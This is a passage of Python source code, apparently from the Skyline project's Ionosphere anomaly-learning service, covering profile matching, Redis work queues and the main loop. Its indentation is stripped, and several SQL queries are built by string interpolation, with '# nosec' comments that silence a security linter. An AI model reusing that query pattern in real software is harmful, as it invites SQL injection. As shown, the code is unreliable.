str(fp_id), str(metric_timestamp)))
# @added 20170331 - Task #1988: Review - Ionosphere layers - always show layers
# Feature #1960: ionosphere_layers
# Added mirror functionality of the layers_id_matched_file
# for feature profile matches too as it has proved useful
# in the frontend with regards to training data sets being
# matched by layers and can do the same for in the frontend
# training data for feature profile matches too.
if not_anomalous:
profile_id_matched_file = '%s/%s.profile_id_matched.fp_id' % (
metric_training_data_dir, base_name)
if not os.path.isfile(profile_id_matched_file):
try:
write_data_to_file(skyline_app, profile_id_matched_file, 'w', str(fp_id))
logger.info('added matched fp_id %s - %s' % (
str(fp_id), profile_id_matched_file))
except:
logger.info(traceback.format_exc())
logger.error('error :: added matched fp_id %s - %s' % (
str(fp_id), profile_id_matched_file))
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# Stop on the first match
break
# https://docs.scipy.org/doc/numpy/reference/generated/numpy.testing.assert_almost_equal.html
# @added 20161214 - Add a between timeframe option, e.g. if
# fp match, only see this as not anomalous if hour (and or min)
# is between x and y - handle rollovers, cron log archives, etc.
logger.info('debug :: %s is a features profile for %s' % (str(fp_id), base_name))
# @added 20170115 - Feature #1854: Ionosphere learn - generations
# If this is an ionosphere_learn check them we handle it before
# the others and exit and ionosphere_learn uses the Redis work
# queue. Here we go! Learn!
if added_by == 'ionosphere_learn':
if not_anomalous:
logger.info('an ionosphere_learn metric has been found to be not anomalous before')
# @added 20170607 - Feature #2010: Ionosphere learn - rate limiting profile learning
learning_rate_limited = False
now = int(time())
rate_limit_timestamp = now - 3600
rate_limit_datetime = datetime.fromtimestamp(rate_limit_timestamp)
f = '%Y-%m-%d %H:%M:%S'
after_datetime = rate_limit_datetime.strftime(f)
try:
connection = engine.connect()
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
result = connection.execute(
'SELECT * FROM ionosphere WHERE metric_id=%s AND created_timestamp > \'%s\' AND generation > 1' % (str(metrics_id), str(after_datetime))) # nosec
for row in result:
last_full_duration = row['full_duration']
if int(full_duration) <= int(last_full_duration):
learning_rate_limited = True
break
except:
logger.error(traceback.format_exc())
logger.error('error :: determining whether learning should be rate limited')
if learning_rate_limited:
logger.info('learning currently dynamically rate limited on %s' % str(base_name))
# Exit the ionosphere_learn check
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
else:
logger.info('learning is not currently rate limited on %s' % str(base_name))
# @added 20170605 - Bug #2038: Ionosphere learn parent generation incorrect
# Determine generation of the matched fp not the last in the
# list
try:
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
stmt = 'SELECT generation FROM ionosphere WHERE id=%s' % str(fp_id) # nosec
connection = engine.connect()
for row in engine.execute(stmt):
matched_fp_generation = int(row['generation'])
connection.close()
logger.info(
'determined matched fp_id %s is a generation %s profile' % (
str(fp_id), str(matched_fp_generation)))
current_fp_generation = matched_fp_generation
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine generation from ionosphere table for fp id %s' % str(fp_id))
logger.info(
'ionosphere_learn metric matches the generation %s features profile id %s - %s' % (
str(current_fp_generation), str(fp_id), base_name))
# Added Redis to work_set, learn will then go off and create
# the features profile with the parent training data if
# less than max_generations, although ionosphere_learn
# should not should Ionosphere any work if the result would
# be greater than max_generations
logger.info('adding work item to Redis set ionosphere.learn.work')
ionosphere_job = 'learn_fp_learnt'
work_deadline = 'Soft'
try:
logger.info(
'LEARNT :: adding work to Redis ionosphere.learn.work set - [\'%s\', \'%s\', %s, \'%s\', %s, %s] to create a learnt features profile' % (
work_deadline, str(ionosphere_job), str(metric_timestamp), base_name,
str(fp_id), str(current_fp_generation)))
# modified 20190412 - Task #2824: Test redis-py upgrade
# Task #2926: Update dependencies
# self.redis_conn.sadd('ionosphere.learn.work', ['Soft', str(ionosphere_job), int(metric_timestamp), base_name, int(fp_id), int(current_fp_generation)])
self.redis_conn.sadd('ionosphere.learn.work', str(['Soft', str(ionosphere_job), int(metric_timestamp), base_name, int(fp_id), int(current_fp_generation)]))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed adding work to Redis ionosphere.learn.work set - [\'%s\', \'%s\', %s, \'%s\', %s, %s] to make a learn features profile later' % (
work_deadline, str(ionosphere_job), str(metric_timestamp), base_name,
str(fp_id), str(current_fp_generation)))
# Exit the ionosphere_learn check
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @added 20170306 - Feature #1960: ionosphere_layers
# Here we go, let us TEACH you properly. We only evaluate
# the Ionosphere layer algorithms after Skyline has had an
# an opportunity to match the original and learnt features
# profiles. This enables the original, evolutionary,
# generations based learning to be continually evaluated.
# This needs to happen for any future implemenation of
# Feature #1888: Ionosphere learn - evolutionary maturity forget
logger.info('layers algorithms check')
check_layers_algorithms = False
if not not_anomalous:
check_layers_algorithms = True
if added_by == 'ionosphere_learn':
check_layers_algorithms = False
logger.info('ionosphere_learn - layers algorithms check - False')
else:
logger.info('layers algorithms check - True, %s layers to be checked' % str(fp_layers_count))
else:
logger.info('a features profile matched as not_anomalous - layers algorithms check - False')
if check_layers_algorithms and fp_layers_present:
full_duration_in_hours = int(settings.FULL_DURATION) / 3600
mirage_full_duration_json_file = '%s/%s.mirage.redis.%sh.json' % (
metric_training_data_dir, base_name,
str(int(full_duration_in_hours)))
if os.path.isfile(mirage_full_duration_json_file):
full_duration_json_file = mirage_full_duration_json_file
else:
full_duration_json_file = '%s/%s.json' % (metric_training_data_dir, base_name)
anomalous_timeseries = None
if os.path.isfile(full_duration_json_file):
logger.info('full duration ts json available for layers check - %s' % (full_duration_json_file))
try:
# Read the timeseries json file
with open((full_duration_json_file), 'r') as f:
raw_timeseries = f.read()
timeseries_array_str = str(raw_timeseries).replace('(', '[').replace(')', ']')
anomalous_timeseries = literal_eval(timeseries_array_str)
except:
logger.error(traceback.format_exc())
logger.error('error :: could not load json for layers check - %s' % (base_name))
logger.info('data points surfaced for layers check - %s' % (len(anomalous_timeseries)))
else:
logger.error('error :: full duration ts json for layers was not found - %s' % (full_duration_json_file))
matched_layers_id = None
for layers_id in fp_layers_ids:
if not_anomalous:
logger.info('checking layers_id %s - %s layers profiles of %s possible layers' % (
str(layers_id), str(layers_checked_count), str(fp_layers_count)))
if not_anomalous:
logger.info('skipping checking layers_id %s - %s layers profiles of %s possible layers as layer id %s already matched' % (
str(layers_id), str(layers_checked_count), str(fp_layers_count), str(matched_layers_id)))
continue
if int(layers_id) != 0:
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
# @modified 20181014 - Feature #2430: Ionosphere validate learnt features profiles page
# layers_checked += 1
layers_checked_count += 1
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Added to Redis set here and commented out the
# self.layers_checked.append in the try below this
redis_set = 'ionosphere.layers_checked'
data = layers_id
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# Get the layers algorithms and run then on the timeseries
# @modified 20170307 - Feature #1960: ionosphere_layers
# Use except on everything, remember how fast Skyline can iterate
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Added to the ionosphere.layers_checked Redis set
# above
# self.layers_checked.append(layers_id)
# @added 2018075 - Task #2446: Optimize Ionosphere
# Branch #2270: luminosity
# not_anomalous = run_layer_algorithms(base_name, layers_id, anomalous_timeseries)
# @modified 20181013 - Feature #2430: Ionosphere validate learnt features profiles page
# not_anomalous = run_layer_algorithms(base_name, layers_id, anomalous_timeseries, fp_layers_count, layers_checked)
not_anomalous = run_layer_algorithms(base_name, layers_id, anomalous_timeseries, fp_layers_count, layers_checked_count)
if not_anomalous:
matched_layers_id = layers_id
except:
logger.error(traceback.format_exc())
logger.error('error :: run_layer_algorithms failed for layers_id - %s' % (str(layers_id)))
if not_anomalous:
logger.info('not_anomalous :: layers_id %s was matched after checking %s layers profiles of %s possible layers' % (
str(layers_id), str(layers_checked_count), str(fp_layers_count)))
else:
logger.info('still anomalous :: layers_id %s was NOT matched after checking %s layers profiles of %s possible layers' % (
str(layers_id), str(layers_checked_count), str(fp_layers_count)))
if not not_anomalous:
logger.info('anomalous - no features profiles layers were matched - %s' % base_name)
# @added 20170308 - Feature #1960: ionosphere_layers
# Feature #1854: Ionosphere learn
# A create a layer_id matched txt file in the training_data dir
# to advise the operator if a training_data set has been matched
# by a layer. Further below if app is not ionosphere_learn a
# 'learn_fp_generation' ionosphere_job is added so ionosphere_learn
# can still try and learning from the existing features profiles
# that exist even if a layer matched as not_anomalous.
if not_anomalous:
layers_id_matched_file = '%s/%s.layers_id_matched.layers_id' % (
metric_training_data_dir, base_name)
if not os.path.isfile(layers_id_matched_file):
try:
write_data_to_file(skyline_app, layers_id_matched_file, 'w', str(matched_layers_id))
logger.info('added matched layers_id %s - %s' % (
str(matched_layers_id), layers_id_matched_file))
except:
logger.info(traceback.format_exc())
logger.error('error :: added matched layers_id %s - %s' % (
str(matched_layers_id), layers_id_matched_file))
else:
logger.info('no layers algorithm check required')
# Ionosphere layers DONE
# @added 20200904 - Feature #3734: waterfall alerts
# Remove the metric from the waterfall_alerts Redis set
# [metric, timestamp, value, added_to_waterfall_timestamp]
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp]
remove_waterfall_alert(added_by, metric_timestamp, base_name)
if not not_anomalous:
logger.info('anomalous - no feature profiles were matched - %s' % base_name)
# @added 20170116 - Feature #1854: Ionosphere learn
# If this is an ionosphere_learn check an Ionosphere alert will
# not be sent back to Analyzer, Mirage or the ionosphere.learn.work
# Redis set. We exit, work is done.
if added_by == 'ionosphere_learn':
logger.info('ionosphere_learn check complete - %s' % base_name)
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.anomalous_metrics.append(base_name)
redis_set = 'ionosphere.anomalous_metrics'
data = base_name
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# Send to panorama as Analyzer and Mirage will only alert on the
# anomaly, they will not push it to Panorama
if settings.PANORAMA_ENABLED:
if not os.path.exists(settings.PANORAMA_CHECK_PATH):
mkdir_p(settings.PANORAMA_CHECK_PATH)
# Note:
# The values are enclosed is single quoted intentionally
# as the imp.load_source used results in a shift in the
# decimal position when double quoted, e.g.
# value = "5622.0" gets imported as
# 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
# single quoting results in the desired,
# 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0
added_at = str(int(time()))
source = 'graphite'
panorama_anomaly_data = 'metric = \'%s\'\n' \
'value = \'%s\'\n' \
'from_timestamp = \'%s\'\n' \
'metric_timestamp = \'%s\'\n' \
'algorithms = %s\n' \
'triggered_algorithms = %s\n' \
'app = \'%s\'\n' \
'source = \'%s\'\n' \
'added_by = \'%s\'\n' \
'added_at = \'%s\'\n' \
% (base_name, str(anomalous_value), str(int(from_timestamp)),
str(int(metric_timestamp)), str(settings.ALGORITHMS),
str(triggered_algorithms), skyline_app, source,
this_host, added_at)
# Create an anomaly file with details about the anomaly
panorama_anomaly_file = '%s/%s.%s.txt' % (
settings.PANORAMA_CHECK_PATH, added_at,
base_name)
try:
write_data_to_file(
skyline_app, panorama_anomaly_file, 'w',
panorama_anomaly_data)
logger.info('added panorama anomaly file :: %s' % (panorama_anomaly_file))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Moved to the Redis set function below
# self.sent_to_panorama.append(base_name)
except:
logger.error('error :: failed to add panorama anomaly file :: %s' % (panorama_anomaly_file))
logger.info(traceback.format_exc())
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
redis_set = 'ionosphere.sent_to_panorama'
data = base_name
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# alert ... hmmm the harder part, maybe not all the resources
# are already created, so just determining ALERTS and firing a
# trigger_alert (pull in alerter.py and mirage_alerters.py?)
# OR send back to app via Redis
# @modified 20170116 - Feature #1854: Ionosphere learn
# Only do the cache_key if not ionosphere_learn
if added_by != 'ionosphere_learn':
# @added 20200908 - Feature #3734: waterfall alerts
# Remove any waterfall_alert items
remove_waterfall_alert(added_by, metric_timestamp, base_name)
# @modified 20200908 - Feature #3734: waterfall alerts
# Use common return_to_sender_to_alert function
# cache_key = 'ionosphere.%s.alert.%s.%s' % (added_by, metric_timestamp, base_name)
# added 20190412 - Task #2824: Test redis-py upgrade
# Task #2926: Update dependencies
# Added cache_key_value
# cache_key_value = [float(anomalous_value), base_name, int(metric_timestamp), triggered_algorithms, full_duration]
# try:
# self.redis_conn.setex(
# cache_key, 300,
# # modified 20190412 - Task #2824: Test redis-py upgrade
# # Task #2926: Update dependencies
# # [float(anomalous_value), base_name, int(metric_timestamp), triggered_algorithms, full_duration])
# str(cache_key_value))
# logger.info(
# 'add Redis alert key - %s - %s' %
# (cache_key, str(cache_key_value)))
# except:
# logger.error(traceback.format_exc())
# logger.error(
# 'error :: failed to add Redis key - %s - [%s, \'%s\', %s, %s, %s]' %
# (cache_key, str(anomalous_value), base_name, str(int(metric_timestamp)),
# str(triggered_algorithms), str(full_duration)))
# @modified 20201001 - Task #3748: POC SNAB
# Added algorithms_run required to determine the anomalyScore
# so this needs to be sent to Ionosphere so Ionosphere
# can send it back on an alert.
return_to_sender_to_alert(added_by, metric_timestamp, base_name, anomalous_value, triggered_algorithms, full_duration, algorithms_run)
# @added 20170116 - Feature #1854: Ionosphere learn
# Added an ionosphere_learn job for the timeseries that did not
# match any profiles. Here we go! Learn!
if added_by != 'ionosphere_learn':
ionosphere_job = 'learn_fp_generation'
logger.info(
'adding an ionosphere_learn %s job for the timeseries that did not match any profiles - %s' % (
ionosphere_job, base_name))
try:
logger.info(
'adding work to Redis ionosphere.learn.work set - [\'Soft\', \'%s\', %s, \'%s\', None, None] to make a learn features profile later' % (
str(ionosphere_job), str(int(metric_timestamp)),
base_name))
# modified 20190412 - Task #2824: Test redis-py upgrade
# Task #2926: Update dependencies
# self.redis_conn.sadd('ionosphere.learn.work', ['Soft', str(ionosphere_job), int(metric_timestamp), base_name, None, None])
self.redis_conn.sadd('ionosphere.learn.work', str(['Soft', str(ionosphere_job), int(metric_timestamp), base_name, None, None]))
except:
logger.error(traceback.format_exc())
logger.error(
'error :: failed adding work to Redis ionosphere.learn.work set - [\'Soft\', \'%s\', %s, \'%s\', None, None] to make a learn features profile later' % (
str(ionosphere_job), str(int(metric_timestamp)),
base_name))
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
self.remove_metric_check_file(str(metric_check_file))
if engine:
engine_disposal(engine)
return
def run(self):
"""
Called when the process intializes.
"""
# Log management to prevent overwriting
# Allow the bin/<skyline_app>.d to manage the log
if os.path.isfile(skyline_app_logwait):
try:
logger.info('removing %s' % skyline_app_logwait)
os.remove(skyline_app_logwait)
except OSError:
logger.error('error :: failed to remove %s, continuing' % skyline_app_logwait)
pass
now = time()
log_wait_for = now + 5
while now < log_wait_for:
if os.path.isfile(skyline_app_loglock):
sleep(.1)
now = time()
else:
now = log_wait_for + 1
logger.info('starting %s run' % skyline_app)
if os.path.isfile(skyline_app_loglock):
logger.error('error :: bin/%s.d log management seems to have failed, continuing' % skyline_app)
try:
os.remove(skyline_app_loglock)
logger.info('log lock file removed')
except OSError:
logger.error('error :: failed to remove %s, continuing' % skyline_app_loglock)
pass
else:
logger.info('bin/%s.d log management done' % skyline_app)
# @added 20190524 - Bug #3050: Ionosphere - Skyline and Graphite feedback
logger.info('SKYLINE_FEEDBACK_NAMESPACES is set to %s' % str(SKYLINE_FEEDBACK_NAMESPACES))
while True:
now = time()
# Make sure Redis is up
try:
self.redis_conn.ping()
if ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: connected to Redis')
except:
logger.error('error :: cannot connect to redis at socket path %s' % (
settings.REDIS_SOCKET_PATH))
sleep(30)
# @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow
# @added 20191115 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# if settings.REDIS_PASSWORD:
# self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH)
# else:
# self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
self.redis_conn = get_redis_conn(skyline_app)
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
continue
# Report app up
try:
self.redis_conn.setex(skyline_app, 120, now)
logger.info('updated Redis key for %s up' % skyline_app)
except:
logger.error('error :: failed to update Redis key for %s up' % skyline_app)
# @modified 20200330 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Wrapped purging up in a conditional to allow the user to offload
# purging to a script and cron if they so desire for any reason.
if IONOSPHERE_MANAGE_PURGE:
# purge_old_data_dirs after every check file run, this takes less
# than a second and keeps the purging somewhat consistent with
# input rate.
# @added 20200723 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Do not purge every run
try:
last_purge_timestamp = self.redis_conn.get(last_purge_key)
except:
logger.error('error :: failed to get Redis key %s' % last_purge_key)
last_purge_timestamp = 0
if not last_purge_timestamp:
try:
logger.info('purging any old training data')
self.purge_old_data_dirs(
settings.IONOSPHERE_DATA_FOLDER,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR)
except:
logger.error('error :: purge_old_data_dirs - %s' % traceback.print_exc())
if ENABLE_IONOSPHERE_DEBUG:
logger.info(
'debug :: self.purge_old_data_dirs(%s, %s)' %
settings.IONOSPHERE_DATA_FOLDER,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR)
# @added 20170110 - Feature #1854: Ionosphere learn
# purge_old_data_dirs learn data
if settings.IONOSPHERE_LEARN:
try:
logger.info('purging any old learning data')
self.purge_old_data_dirs(
settings.IONOSPHERE_LEARN_FOLDER,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR)
except:
logger.error('error :: purge_old_data_dirs learn - %s' % traceback.print_exc())
if ENABLE_IONOSPHERE_DEBUG:
logger.info(
'debug :: self.purge_old_data_dirs(%s, %s)' %
settings.IONOSPHERE_LEARN_FOLDER,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR)
else:
logger.info('purge is not managed by Ionosphere - IONOSPHERE_MANAGE_PURGE = %s' % str(IONOSPHERE_MANAGE_PURGE))
# @added 20200731 - Feature #3462: Add IONOSPHERE_MANAGE_PURGE
# Still manage training data
try:
last_purge_timestamp = self.redis_conn.get(last_purge_key)
except:
logger.error('error :: failed to get Redis key %s' % last_purge_key)
last_purge_timestamp = 0
if not last_purge_timestamp:
try:
logger.info('running purge_old_data_dirs only to manage ionosphere.training_data')
self.purge_old_data_dirs(
settings.IONOSPHERE_DATA_FOLDER,
settings.IONOSPHERE_KEEP_TRAINING_TIMESERIES_FOR)
except:
logger.error('error :: purge_old_data_dirs - %s' % traceback.print_exc())
# @added 20170916 - Feature #1996: Ionosphere - matches page
# Create the ionosphere_summary_memcache_object
# @modified 20180103 - Feature #1996: Ionosphere - matches page
# The ionosphere_summary_list memcache object is not managed in
# ionosphere.py and was an artefact of some dev work that may
# resume at some point
# if settings.MEMCACHE_ENABLED:
# try:
# logger.info('updating the ionosphere_summary_memcache_object')
# self.update_ionosphere_summary_memcache_object
# except:
# logger.error('error :: update_ionosphere_summary_memcache_object - %s' % traceback.print_exc())
# self.populate the database metatdata tables
# What is my host id in the Skyline panorama DB?
host_id = False
# @added 20170825 - Task #2132: Optimise Ionosphere DB usage
# Check memcached before MySQL
if settings.MEMCACHE_ENABLED:
hosts_id_key = 'hosts.id.%s' % this_host
try:
# @modified 20191029 - Task #3304: py3 - handle pymemcache bytes not str
# host_id = self.memcache_client.get(hosts_id_key)
if python_version == 2:
host_id = self.memcache_client.get(hosts_id_key)
else:
host_id = self.memcache_client.get(hosts_id_key).decode('utf-8')
# if memcache does not have the key the response to the
# client is None, it does not except
except:
logger.error('error :: failed to get %s from memcache' % hosts_id_key)
try:
self.memcache_client.close()
except:
# @modified 20170913 - Task #2160: Test skyline with bandit
# pass
logger.error('error :: failed to close memcache_client')
if host_id:
logger.info('using memcache %s key data' % hosts_id_key)
logger.info('host_id: %s' % str(host_id))
if not host_id:
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
query = 'select id FROM hosts WHERE host=\'%s\'' % this_host # nosec
results = mysql_select(skyline_app, query)
if results:
host_id = results[0][0]
logger.info('host_id: %s' % str(host_id))
else:
logger.info('failed to determine host id of %s' % this_host)
if host_id and settings.MEMCACHE_ENABLED:
try:
self.memcache_client.set(hosts_id_key, int(host_id))
logger.info('populated memcache %s key' % hosts_id_key)
except:
logger.error('error :: failed to set %s in memcache' % hosts_id_key)
try:
self.memcache_client.close()
except:
# @modified 20170913 - Task #2160: Test skyline with bandit
# pass
logger.error('error :: failed to close memcache_client')
# if not known - INSERT hostname INTO host
if not host_id:
logger.info('inserting %s into hosts table' % this_host)
# @modified 20170913 - Task #2160: Test skyline with bandit
# Added nosec to exclude from bandit tests
query = 'insert into hosts (host) VALUES (\'%s\')' % this_host # nosec
host_id = self.mysql_insert(query)
if host_id:
logger.info('new host_id: %s' % str(host_id))
if not host_id:
logger.error(
'error :: failed to determine populate %s into the hosts table' %
this_host)
sleep(30)
continue
"""
Determine if any metric has been added to add
"""
# while True:
while 1:
metric_var_files = False
try:
metric_var_files = [f for f in listdir(settings.IONOSPHERE_CHECK_PATH) if isfile(join(settings.IONOSPHERE_CHECK_PATH, f))]
except:
logger.error('error :: failed to list files in check dir')
logger.info(traceback.format_exc())
# @added 20200109 - Feature #3380: Create echo features profile when a Mirage features profile is created
# Process the ionosphere.echo.work queue as echo features
# profiles cannot be easily shoehorned into the
# ionosphere.learn.work pipeline
try:
ionosphere_echo_enabled = settings.IONOSPHERE_ECHO_ENABLED
except:
ionosphere_echo_enabled = False
echo_job = False
if not metric_var_files and ionosphere_echo_enabled:
ionosphere_echo_work = None
echo_job = False
try:
ionosphere_echo_work = self.redis_conn_decoded.smembers('ionosphere.echo.work')
except Exception as e:
logger.error('error :: could not query Redis for ionosphere.echo.work - %s' % e)
if ionosphere_echo_work:
echo_work_queue_items = len(ionosphere_echo_work)
if echo_work_queue_items > 0:
echo_job = True
logger.info('processing a ionosphere.echo.work item')
if echo_job:
for index, ionosphere_echo_work in enumerate(ionosphere_echo_work):
try:
echo_metric_list = literal_eval(ionosphere_echo_work)
echo_metric_timestamp = int(echo_metric_list[2])
echo_base_name = str(echo_metric_list[3])
echo_full_duration = int(echo_metric_list[6])
break
except:
logger.error(traceback.format_exc())
logger.error('error :: could not determine details from ionosphere_echo_work item')
continue
if not echo_base_name:
echo_job = False
if echo_job:
# When an item is in the ionosphere.echo.work set it needs
# metric_echo_check_file created to pass to process_ionosphere_echo
echo_metric_check_file = '%s/%s.%s.echo.txt' % (
settings.SKYLINE_TMP_DIR, str(echo_metric_timestamp),
echo_base_name)
echo_create_fp_metric_key = 'ionosphere.%s.%s.echo_create_check' % (
str(echo_metric_timestamp), echo_base_name)
echo_create_fp_metric_count = 1
try:
echo_create_fp_metric_count = self.redis_conn.get(echo_create_fp_metric_key)
except Exception as e:
logger.error('error :: could not query Redis for %s: %s' % (echo_metric_check_file, e))
if not echo_create_fp_metric_count:
echo_create_fp_metric_count = 1
else:
echo_create_fp_metric_count += 1
if os.path.isfile(str(echo_metric_check_file)):
logger.error('error :: echo_metric_check_file - %s already exists, removing' % (
echo_metric_check_file))
self.remove_metric_check_file(echo_metric_check_file)
if echo_create_fp_metric_count >= 3:
logger.error('error :: echo_create_fp_metric_count is %s, no further attempts will be made to create an echo fp for %s' % (
str(echo_create_fp_metric_count), str(echo_metric_list)))
logger.info('removing ionosphere.echo.work item %s' % (
str(echo_metric_list)))
work_set = 'ionosphere.echo.work'
try:
self.redis_conn.srem(work_set, str(echo_metric_list))
logger.info('removed work item - %s - from Redis set - %s' % (str(echo_metric_list), work_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove work item list from Redis set - %s' % work_set)
echo_job = False
if echo_job:
check_data = 'metric = \'%s\'\n' \
'metric_timestamp = \'%s\'\n' \
'added_by = \'%s\'\n' \
'full_duration = \'%s\'\n' \
% (str(echo_base_name), str(echo_metric_timestamp),
'webapp', str(echo_full_duration))
echo_metric_check_file_created = False
try:
write_data_to_file(skyline_app, echo_metric_check_file, 'w', check_data)
logger.info('added ionosphere.echo.work item check file for process_ionosphere_echo - %s' % (
echo_metric_check_file))
echo_metric_check_file_created = True
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add ionosphere.echo.work item check file for process_ionosphere_echo - %s' % (
echo_metric_check_file))
if echo_metric_check_file_created:
# Set a Redis key so that if the echo fp creation fails
# a continous loop to try to create it does not occur
try:
self.redis_conn.setex(echo_create_fp_metric_key, 3600, echo_create_fp_metric_count)
logger.info('updated Redis key %s' % echo_create_fp_metric_key)
except:
logger.error('error :: failed to update Redis key %s' % echo_create_fp_metric_key)
# Spawn a single process_ionosphere_echo process
function_name = 'process_ionosphere_echo'
pids = []
spawned_pids = []
pid_count = 0
now = time()
for i in range(1, IONOSPHERE_PROCESSES + 1):
try:
p = Process(target=self.process_ionosphere_echo, args=(i, echo_metric_check_file))
pids.append(p)
pid_count += 1
logger.info(
'starting %s of %s %s for ionosphere.echo.work item' % (
str(pid_count), str(IONOSPHERE_PROCESSES),
function_name))
p.start()
spawned_pids.append(p.pid)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to start %s for ionosphere.echo.work item' % function_name)
continue
# Self monitor the process and terminate if the
# process_ionosphere_echo has run for too long
try:
ionosphere_echo_max_fp_create_time = settings.IONOSPHERE_ECHO_MAX_FP_CREATE_TIME
except:
ionosphere_echo_max_fp_create_time = 55
p_starts = time()
while time() - p_starts <= ionosphere_echo_max_fp_create_time:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info(
'%s %s completed in %.2f seconds for ionosphere.echo.work item' % (
str(IONOSPHERE_PROCESSES),
function_name, time_to_run))
work_set = 'ionosphere.echo.work'
try:
self.redis_conn.srem(work_set, str(echo_metric_list))
logger.info('removed work item - %s - from Redis set - %s' % (str(echo_metric_list), work_set))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove work item list from Redis set - %s' % work_set)
self.remove_metric_check_file(echo_metric_check_file)
break
else:
# We only enter this if we didn't 'break' above.
logger.info('timed out, killing all %s processes for ionosphere.echo.work item' % (function_name))
for p in pids:
try:
p.terminate()
# p.join()
logger.info('killed %s process for ionosphere.echo.work item' % (function_name))
except:
logger.error(traceback.format_exc())
logger.error('error :: killing all %s processes for ionosphere.echo.work item' % function_name)
if not metric_var_files:
logger.info('sleeping 20 no metric check files')
sleep(20)
up_now = time()
# Report app up
try:
self.redis_conn.setex(skyline_app, 120, up_now)
logger.info('updated Redis key for %s up' % skyline_app)
except:
logger.error('error :: failed to update Redis key for %s up' % skyline_app)
# @added 20161228 - Feature #1828: ionosphere - mirage Redis data features
# Branch #922: Ionosphere
# Bringing Ionosphere online - do alert on Ionosphere metrics
# Manage the ionosphere.unique_metrics Redis set which is queried
# by Analyzer and Mirage, yes and we use multiprocessing
last_update = None
try:
last_update = self.redis_conn.get('ionosphere.manage_ionosphere_unique_metrics')
except Exception as e:
logger.error('error :: could not query Redis for ionosphere.manage_ionosphere_unique_metrics: %s' % e)
if not last_update:
pids = []
now = time()
try:
logger.info('starting manage_ionosphere_unique_metrics process')
p = Process(target=self.manage_ionosphere_unique_metrics)
pids.append(p)
p.start()
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to start manage_ionosphere_unique_metrics')
# Self monitor process and terminate if run for too long
p_starts = time()
# @modified 20200507 - increase the allowed time
# while time() - p_starts <= 5:
while time() - p_starts <= 20:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info(
'manage_ionosphere_unique_metrics completed in %.2f seconds' % (
time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('%s :: timed out, killing manage_ionosphere_unique_metrics process' % (skyline_app))
for p in pids:
try:
p.terminate()
# p.join()
logger.info('%s :: killed manage_ionosphere_unique_metrics process' % (skyline_app))
except:
logger.error(traceback.format_exc())
logger.error('error :: killing all manage_ionosphere_unique_metrics processes')
# Discover metric anomalies to insert
metric_var_files = False
try:
metric_var_files = [f for f in listdir(settings.IONOSPHERE_CHECK_PATH) if isfile(join(settings.IONOSPHERE_CHECK_PATH, f))]
logger.info('metric check files found - %s' % str(len(metric_var_files)))
except:
logger.error('error :: failed to list files in check dir')
logger.info(traceback.format_exc())
# @added 20170104 - Feature #1842: Ionosphere - Graphite now graphs
# Task #1658: Patterning Skyline Ionosphere
# Send Ionosphere metrics to Graphite every minute now that
# Ionosphere is better tuned and Reset lists
cache_key = '%s.sent_graphite_metrics' % skyline_app
redis_sent_graphite_metrics = False
try:
redis_sent_graphite_metrics = self.redis_conn.get(cache_key)
except Exception as e:
logger.error('error :: could not query Redis for key %s: %s' % (cache_key, e))
# Flush metrics to Graphite
if not redis_sent_graphite_metrics:
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# not_anomalous = str(len(self.not_anomalous))
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# not_anomalous = str(len(list(self.redis_conn.smembers('ionosphere.not_anomalous'))))
